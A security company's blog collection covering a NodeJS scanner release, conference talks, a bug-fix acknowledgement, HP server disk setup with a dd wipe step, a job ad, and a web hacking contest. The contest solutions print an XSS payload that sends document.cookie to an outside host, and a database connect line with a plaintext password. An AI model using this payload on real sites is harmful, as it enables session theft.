Security Code Review of 700 projects written in NodeJS

TLTR: in the last two weeks we rewrote NodeJsScan and published it’s security analysis of over 700 projects hosted on GitHub.

Long story: Writing secure Node.JS is hard, almost no tools and little awareness. We felt the same pain while performing an increasing number of Code Reviews in Node and wanted to improve our internal process. That’s why we rewrote NodeJsScan to have better reporting and a JSON output. It’s not a substitute of manual review but it serves it’s use as an additional input for the audit and has customizable XML rules.

By testing it we ran a batch of more than 700 scans and released the output here: Security Audit of Node.JS projects ( It has an high rate of false-positive so not for the pavid :)

–Francesco `ascii` ongaro

Conferences, ISGroup

Grappa Hat Aosta 4,5,6 March 2016

We want to thank all the attendees of Grappa Hat, a security conference in Aosta that took place over the past week-end. The mood was relaxing and informal, the city is surrounded by mountains and beauty and we had a chance to meet long-time friends and to make new ones too!

Personally I presented the speech I’m going to bring to the International Journalism Festival ( on 8 April in Perugia, an happening I warmly recommend to anybody interested in Digital Rights, Privacy and, obviously, Journalism ^_^

The talk is titled The lost war on Information Security and it highlights some regressions from the security standpoint that the Cloud paradigm is going to cause:

The lost war on Information Security

It happened, software ate the world, we lost control on our information and security is not better than before.

How to stem organized crime, corporations and governments appetite on data bubbles generated by Cloud computing? What people could realistically do?

We will explore the major indicators of the current state of software security, its evolution over time and how the adoption trend of Cloud solutions affects the confidentiality, integrity and availability of people’s and companies’s information.

Again thanks everybody, me and Andrea enjoined the time spent together! If you need a copy of the slides and you attended Grappa Hat ping me and I’ll happily send you the PDF :)

Need a pointer? 0x414141, LinkedIn or by Tweet

–Francesco Ongaro


Security fix in EasyAudit Exposure

We want to say thanks to Roberto Urbanus who found an Improper Error Handling and Source Code Disclosure in our EasyAudit Exposure service, a passive vulnerability and reputation management system. In some conditions the registration failed and the returned object was NULL. When the following code tried to access that object’s properties, it failed showing a very verbose debug error handler.

The issue was caused by both not validating the registration and by an error in the routine that selected the correct error handler in production and in development.

Roberto reported on Sunday and we fixed it today (Monday), the new code is online and it also adds some nice new features!

Thanks again!

–Francesco Ongaro
CEO of ISGroup SRL


HP Proliant SE1102 notes

HP Proliant SE1102 were great Special Editions HP released for datacenter customers. Based on the HP ProLiant DL160 G5 Server architecture, they have differences in terms of enabled PCI-Express slots (they are there but my understanding is that only the one who has the pci riser card is usable) and are artificially stripped down in some departments.

One of the issues you could face is their ability to support large drives (>2.2GB), somebody even flashed the DL160 G5 bios on a SE1102 and found that it’s a bios, and not hardware, limitation. You can find the bios on the HP website, it’s called SP52204.exe and will unpack to a USB bootable key. The default flash utility (HPQUSB.exe) will not leave you flash a different unit but the OP succeeded using an alternate utility called “flashrom”.

HP Proliant DL180 G5 server treats 3-TB SATA disks as 750-GB ones

Long short story: we did not feel brave and keep the original bios, also in order to mantain support for 24GB of RAM and found that Linux correctly manage 4TG hard-drives with some trickery. Please note that we did not need boot support from such disks as we boot from a PCI-X SSD that has a standard msdos MBR and partition table.

Our steps with HGST IDK Deskstar NAS 4 TB (ex Hitachi):

  1. Remove any partition header from the disk using dd (dd if=/dev/zero of=/dev/sda count=1 bs=1024);
  2. gdisk /dev/sda and create a GPT partition table;
  3. with parted /dev/sda:
    1. mkpart primary 1049kb 100% create an aligned partition;
    2. set 1 raid on flag it as a raid partition;
    3. align-check opt 1 make sure alignment is correct;
    4. quit :)

Now your HP Proliant SE1102 will boot instead of freezing after the BIOS POST (power-on self-tests).

Many thanks to my colleague and friend Pasquale `sid` Fiorillo who countlessly rebooted this machine until finding the right solution :)



PHP Developer

ISGroup SRL ( is an Information Security company. To achieve the projects and development milestones set, ISGroup is recruiting a new PHP developer to join the team in Verona, Italy.

Skills Required:

  • PHP 5 (experience with Object Oriented Programming)
  • MySQL

Experiences with:

  • YII
  • Linux / Unix
  • Information Security
  • Bash

are a strong plus.

This is a full-time or part-time job offer. Candidates’ skills and experience will make the difference.

When applying, please, attach your CV (our mail is, a very short Cover Letter, where you should link any relevant project you took part in.

We look forward to reading lots of awesome applications!



Reply to David Orban: Creatività, passione e innovazione in Finanza, Banche e Diritto

Thanks David for your lecture. It’s a very interesting set of considerations for somebody who, like me, has a background that doesn’t overlap with the subjects of macro-economics and global finance. Listening your words I can feel the ethics and vision that entail your enthusiasm on the topic.

Regarding the micro-economic and daily use of Bitcoin I see a big problem connected to the safety of John Doe’s savings, and I don’t know how that could be addressed with the currect technical implementation.

The issue is the lack of insurance. In the past we build a protection mechanism where bigger institutions, directed by the corpus iuris, guaranteed and protected your money deposit from some type of threats. This happen with bank accounts under one hundred thousand euros in Italy against a bank crack. This happen with hijacked credit card transactions to maintain an high customer trust in the system itself, an important surveillance and revenue stream in nowadays economy. This happen thanks to insurance policies if your property get destroyed.

Our current money can be simply reprinted or recreated or adjusted in case of a faulty banking IT system.

With Bitcoins or any crypto-currency the safety of the deposit is all on the shoulders of the wallet owner, that must be connected to inherently vulnerable systems like personal computers, notebooks and smart-phones.

We have already seen large-scale attacks against wallets and most of computer trojans now include a bitcoin wallet stealing functionality alongside the old web banking ones. Exchangers themselves have been hacked and have an amateur level of computer security and general hijack resiliency.

Additionally if a user lose the private key or the wallet itself there is no way to recreate that coins.

How can a deflationary, fixed-size-pool, uninsured, global currency like Bitcoin work on the long term? Theoretically, over time, all the created coins could vanish in vapor :)

— Francesco Ongaro


Giacomo Rizzi, Web Security Challenge Winner, H-BANK

H-FARM supercharged the challenge with an amazing prize: an iPad Retina Mini! The contest consisted in three simple web pages to be hacked using the most common web security attack vectors: an XSS, a SQL Injection and a Local File Disclosure.

Giacomo Rizzi demonstrated to be a developer aware of security issues, a paramount ability for a developer. Who would drive a car engineered to be super-fast but absolutely insecure?


Here’s Giacomo with the H-FARM sponsored prize!

image (1)

Thanks again H-FARM for raising the security awareness level of tomorrow’s developers.


H-BANK Outcome: H-BANK Web Security Challenge (#2)

Interested in the challenge source code and solutions? Download the PDF!


Solutions provided by Giacomo Rizzi, the winner of the contest:

Challenge 1: H-FARM</textarea><script> (new Image()).src=””+document.cookie;</script><!–


Challenge 3: $link = mysql_connect(‘’, ‘hackmehard’, ‘Psvm6bPywNQsaMNR’);


H-BANK Outcome: ISGroup SRL @ H-Farm Ventures 8-9 February 2014 (#1)

Venerdi 8 e sabato 9 ISGroup ha partecipato ad H-BANK, un’iniziativa organizzata da H-Farm Ventures presso la sede di Roncade (Treviso).


H-Farm organizza, con cadenza quasi mensile, eventi dinamici e pieni di giovani sviluppatori, designer, presenti e futuri imprenditori. Questo trend positivo ha avuto inizio con HackItaly, a cui abbiamo partecipato creando un progetto ludico chiamato KittensRevenge in collaborazione con un team di validi sviluppatori capitanati da Valter Franchetti. Per darvi un’idea dell’ambiente creativo negli stessi due giorni abbiamo scritto Sniffing the innocent (HackItaly outcome #2) e Aruba networks log parser (HackItaly outcome #1). Lo scopo della presente competizione era partecipare a dei brief creativi di tre banche (Unicredit, IFIS, Intesa San Paolo) realizzando applicazioni e siti web in grado di soddisfare le richieste del cliente.


Il nostro (Francesco Ongaro, Gianluca Pericoli) apporto alla competizione è consistito nell’offrire supporto sulle problematiche di security. Gli sviluppatori dei vari team, nel contesto della maratona di due giorni, potevano porre qualsiasi tipo di domanda sul security design della loro applicazione (“i mattoni che stiamo mettendo assieme hanno un senso dal punto di vista della sicurezza?”) e sull’implementazione sicura di funzionalità specifiche (“questa riga di codice introduce problemi di sicurezza?”).

Inoltre è stato piacevole discutere delle possibili carriere nel nostro settore e dare una panoramica su quello che il mercato richiede, sia per quanto riguarda lo skill-set che le certificazioni professionali che “tirano”.

La sicurezza è il settore in cui operiamo e speriamo che le sfide intellettuali quotidiane di cui si compone il lavoro di un security researcher attirino presto molte giovani menti. A questo proposito vi segnaliamo la possibilità di effettuare degli stage presso la nostra azienda, contattateci!

Partecipando ad H-Farm potete contare sulla disponibilità e sull’esperienza di due grandi persone, Riccardo Donadon e Maurizio Rossi, che non solo sono genuinamente interessati all’innovazione apportata da ogni partecipante, ma offrono, in un periodo economicamente non semplice, un opportunità concreta di crescita per giovani imprenditori.


A tarda notte con la preziosa collaborazione di Marco Pistolesi, ICT Manager di H-Farm, abbiamo organizzato un Web Hacking Contest (simpaticamente chiamato “hack me hard”) che metteva a disposizione 3 pagine affette da 3 diverse vulnerabilità. Lo scopo era, nella migliore tradizione dei contest di sicurezza offensiva, di identificare le vulnerabilità e sfruttarle. Il vincitore della competizione è stato Giacomo Rizzi, uno sviluppatore 19enne che assieme ai compagni di classe ha fornito più velocemente la soluzione.

H-ACK BANK è un esempio di aggregazione di competenze, sviluppo di idee, oltre che un’organizzazione in grado di supportare una maratona con più di 400 partecipanti su più giorni.

O più semplicemente una piacevole opportunità per passare un week-end in un ambiente rilassato :)